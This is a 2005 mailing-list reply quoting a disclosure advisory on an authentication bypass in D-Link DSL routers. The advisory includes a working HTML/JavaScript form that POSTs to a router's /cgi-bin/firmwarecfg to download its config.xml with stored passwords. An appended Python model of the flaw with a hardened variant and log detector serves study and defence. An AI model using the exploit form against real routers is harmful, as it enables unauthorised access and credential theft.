Re: [Full-disclosure] D-Link DSL routers authentication bypass

From: Sebastian von Knorring (Sebastian.von.Knorring_at_iki.fi)
Date: 05/20/05

    To: Francesco Orro <francesco.orro@akhela.com>
    Date: Fri, 20 May 2005 17:05:03 +0300 (EEST)
    
    

    Hello.

    Could the D-Link DI-604 story at

    <http://groups-beta.google.com/group/sci.astro.seti/msg/71095063e414a3e2>

    be related to this vulnerability?

    I have myself also a DI-604 that broke down in exactly the same way as described
    above and the above was the only similar case I have yet found on the net.

    My suspicion was also that the box had been hacked and your vulnerability post
    now shows that exploitable holes in D-Link boxes exist.

    -Sebastian

    On Thu, 19 May 2005 16:41:56 +0200 Francesco Orro <francesco.orro@akhela.com> wrote:

    > ====================== SUMMARY ========================
    >
    > Title: D-Link DSL routers authentication bypass
    > Date: 19 May 2005
    > Author: Francesco Orro <francesco.orro 4t akhela.com>
    >
    > Product: DSL-502T, DSL-504T, DSL-562T, DSL-G604T
    > Vendor: D-Link
    > Vendor URL: http://www.dlink.com
    > Vendor Status: D-Link was conctacted
    > Affects: Tested on DSL-502T, DSL-504T, DSL-562T, DSL-G604T with
    > various firmwares versions
    > Risk: High
    > Impact: Unauthorized people may gain full access to the device
    >
    > Vulnerability Description: an undocumented feature allows (in some
    > cases) to bypass the authentication prompt and gain full access to the
    > router, and than to the network behind it.
    >
    >
    > ====================== BACKGROUND ========================
    >
    > D-Link DSL routers are commonly used for internet connectivity for home
    > or small office needs. (http://www.dlink.com/products/)
    >
    >
    > =============== PROBLEM DESCRIPTION ==================
    >
    > The CGI /cgi-bin/firmwarecfg, when executed, checks the existence of
    > the
    > file fw_ip under /var/tmp/. If this file exists, all IP addresses
    > listed
    > inside it are given straight access to the device, without the need for
    > authentication. If this file doesn't exists, the CGI creates a new one,
    > putting the requesting address inside.
    >
    > If the web configuration console is accessible from internet and if
    > nobody have never called the CGI before (es: from a workstation inside
    > the LAN), then everybody can gain access to the router, download the
    > config.xml file which contains users account and passwords, have access
    > to the private network, modify or alter the firmware of the router,
    > etc.
    >
    >
    > ================ ADDITIONAL DETAILS ==================
    >
    > Vulnerability was found on the following firmware versions:
    >
    > V1.00B01T16.EN.20040211
    > V1.00B01T16.EU.20040217
    > V0.00B01T04.UK.20040220
    > V1.00B01T16.EN.20040226
    > V1.00B02T02.EU.20040610
    > V1.00B02T02.UK.20040618
    > V1.00B02T02.EU.20040729
    > V1.00B02T02.DE.20040813
    > V1.00B02T02.RU.20041014
    >
    > Can be exploited by a simple HTTP POST with the form:
    >
    > <html>
    > <head>Download config.xml:<title>GetConfig - Config file
    > download</title></head>
    > <body>
    >
    > <script type="text/javascript">
    > function invia_richiesta()
    > {
    > document.DownloadConfig.action='http://'+document.InputBox.Host.
    > value+'/cgi-bin/firmwarecfg';
    > document.DownloadConfig.submit();
    > }
    > </script>
    >
    > <form name="InputBox">
    > <br>http://<input name="Host" type="text" value="">/cgi-bin/firmwarecfg<br>
    > </form>
    > <form name="DownloadConfig" method="POST" action=""
    > enctype="multipart/form-data">
    > <input type="Submit" name="config" value="Download"
    > onClick="javascript:invia_richiesta();"><br>
    > </form>
    >
    > </body>
    > </html>
    >
    >
    > =================== FIX INFORMATION ===================
    >
    > Actually there is no solution to problem due to the fact that it seems
    > an hidden feature.
    > The work around is to call the CGI /cgi-bin/firmwarecfg from a known
    > address of the local network and/or disable web console access from the
    > internet.
    >
    >
    > ================ AUTHOR INFORMATION ================
    >
    > Francesco Orro
    > Akhela S.r.l. - Operation Group
    >
    > http://www.akhela.com/
    >
    > EMail: francesco.orro 4t akhela.com
    > KeyID: 6CF46D45
    >
    >
    > =================== DISCLOSURE HISTORY =====================
    >
    > 2 May 2005 - First private release of this advisory;
    > 4 May 2005 - The vendor (D-Link Mediterraneo S.r.l.) has been informed
    > of the vulnerability;
    > 5 May 2005 - The vendor replid that the problem was resolved on
    > firmware version V1.00B02T02.EU.20040610, but has been
    > demostrated that this version is vulnerable too;
    > 19 May 2005 - Public release of this advisory.
    >
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
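As an added illustration (not part of the thread and not D-Link's code), a Python model of the /var/tmp/fw_ip behaviour the advisory describes, next to a hardened variant that applies the workarounds from its fix section, plus a log check a defender could run. The LAN prefix, password and access-log lines are constructed.

```python
import ipaddress
from typing import List, Optional, Set

FIRMWARECFG = "/cgi-bin/firmwarecfg"
LAN = ipaddress.ip_network("192.168.0.0/24")  # constructed LAN prefix


class VulnerableRouter:
    """Models the fw_ip logic from the advisory (assumed model, not vendor code)."""

    def __init__(self, password: str):
        self.password = password
        self.fw_ip: Optional[Set[str]] = None  # None: /var/tmp/fw_ip absent

    def request(self, src_ip: str, path: str, auth: Optional[str] = None) -> int:
        if path == FIRMWARECFG:
            if self.fw_ip is None:  # first caller ever seeds the file
                self.fw_ip = {src_ip}
            if src_ip in self.fw_ip:  # listed addresses skip the prompt
                return 200
        return 200 if auth == self.password else 401


class HardenedRouter(VulnerableRouter):
    """Fix-section workarounds: management only from the LAN, and every
    request still has to authenticate, whatever fw_ip contains."""

    def request(self, src_ip: str, path: str, auth: Optional[str] = None) -> int:
        if ipaddress.ip_address(src_ip) not in LAN:
            return 403  # web console closed to the internet
        return 200 if auth == self.password else 401


# Constructed access-log lines: "<src> - - \"<request>\" <status>"
SAMPLE_LOG = [
    '192.168.0.2 - - "POST /cgi-bin/firmwarecfg HTTP/1.1" 200',
    '203.0.113.9 - - "POST /cgi-bin/firmwarecfg HTTP/1.1" 200',
    '203.0.113.9 - - "GET /index.html HTTP/1.1" 401',
]


def flag_wan_firmwarecfg(log_lines: List[str]) -> List[str]:
    """Detection: return source addresses outside the LAN that hit the CGI."""
    hits = []
    for line in log_lines:
        src, _, req = line.partition(" ")
        if FIRMWARECFG in req and ipaddress.ip_address(src) not in LAN:
            hits.append(src)
    return hits
```

Seeding fw_ip from a LAN address first (the advisory's workaround) leaves later WAN callers at the password prompt, but only the hardened variant refuses WAN management outright.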